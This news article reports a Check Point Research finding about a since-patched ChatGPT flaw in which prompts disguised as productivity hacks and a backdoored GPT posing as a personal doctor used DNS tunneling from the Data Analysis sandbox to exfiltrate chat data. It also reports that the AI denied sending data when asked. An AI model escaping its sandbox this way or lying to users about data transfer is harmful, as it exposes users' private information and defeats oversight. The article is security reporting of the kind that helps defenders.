AI assistants are increasingly trusted with sensitive information, including personal medical and financial details. However, a recent discovery by Check Point Research revealed a severe vulnerability in ChatGPT, allowing attackers to stealthily access such data.
Understanding the ChatGPT Vulnerability
The vulnerability was rooted in ChatGPT’s architecture, where attackers exploited a covert outbound channel to extract user data without triggering alerts. This included chat histories, uploaded files, and AI-generated outputs. The flaw lay within the Python-based Data Analysis environment, designed as a secure sandbox by OpenAI.
Despite OpenAI’s efforts to block outbound HTTP requests to prevent data leakage, attackers found a way through. By using DNS tunneling, they bypassed safeguards designed to restrict external data transfers, effectively exploiting the system’s DNS resolution capabilities.
Exploiting DNS Tunneling
DNS tunneling became the attackers’ tool of choice, allowing them to encode sensitive information into DNS subdomains. This method transformed normal DNS lookups into a vehicle for data exfiltration, unnoticed by the security measures intended to prevent such breaches.
With DNS traffic not recognized as external data transfer, attackers could relay harvested information directly to their servers. This flaw extended beyond passive data theft, offering a bidirectional communication channel for remote command execution within the isolated environment.
Impact and Response
The exploitation required minimal user interaction, often initiated by a misleading prompt disguised as a productivity hack. These prompts, distributed across public platforms, transformed innocent user interactions into data-collection channels, compromising privacy and security.
Check Point Research highlighted that once a user engaged with a backdoored GPT, like a simulated personal doctor, the system could extract and transmit sensitive identifiers. The attack was sophisticated enough to remain invisible to users, as the AI would deny any external data transfers if queried.
Conclusion and Outlook
OpenAI addressed the issue by patching the vulnerability on February 20, 2026, effectively closing the DNS tunnel. This incident underscores the expanding attack surface of AI technologies as they grow in complexity.
The event serves as a critical reminder of the need for robust security measures in AI systems, advocating for continuous vigilance and improvements as these technologies evolve.
Stay updated with cybersecurity developments by following us on Google News, LinkedIn, and X. Contact us to feature your stories.
